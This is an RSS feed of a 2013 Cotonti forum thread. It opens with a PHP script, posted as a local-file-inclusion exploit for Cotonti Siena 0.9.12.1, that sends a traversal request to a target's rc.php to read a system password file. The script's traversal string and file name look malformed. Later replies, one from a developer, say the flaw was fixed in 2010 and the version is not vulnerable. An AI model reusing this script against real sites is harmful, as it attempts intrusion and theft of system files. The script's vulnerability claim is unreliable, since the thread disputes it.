cotonti.com : Siena LFI hacking https://www.cotonti.com Neueste Themenbeiträge Cotonti en Fri, 28 Nov 2025 21:43:56 -0000 Trustmaster Seriously, this was fixed in 2010. It is incorrect to say that 0.9.12.1 is vulnerable.

]]> Mo, 18 Feb 2013 18:24:37 -0000 tensh does it work on previous Sienas? How to prevent it? Can I just delete this file?

]]> Mo, 18 Feb 2013 08:43:11 -0000 Xerora This won't work on 0.9.12.1. It seems like this has been the case for many versions before 0.9.12.1 as well as far as I can tell.

edit: removed line that could be misread about the error that it would return

]]> So, 17 Feb 2013 06:18:08 -0000 MecTruy LFI attack Cotonti Siena 0.9.12.1 LFI <?php /* * WWW.PUNISH3R.COM * Bug :Cotonti Siena 0.9.12.1 LFI * Author(Pentester) : FreWaL & Dr.Ly0n * Special Thanks : Z0rLu, MaXtoR, MecTruy, Polonia, Monarchy, Eno7, RedWorm, R00tk!d, Harded, The_Mirkin and PUNISH3R all special user * */ $hedef = "http://hedefsite.com"; $dosya = ".%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fetc%2Fpassword"; $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); curl_setopt($curl, CURLOPT_URL, "http://$hedef/rc.php?rc=".$dosya); curl_setopt($curl, CURLOPT_HTTPGET, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($curl, CURLOPT_TIMEOUT, 3); curl_setopt($curl, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($curl, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($curl, CURLOPT_COOKIEJAR, "/tmp/cookie_$hedef"); $cikti = curl_exec ($curl); curl_close($curl); unset($curl); echo $cikti; ?>

 

]]> So, 17 Feb 2013 00:39:47 -0000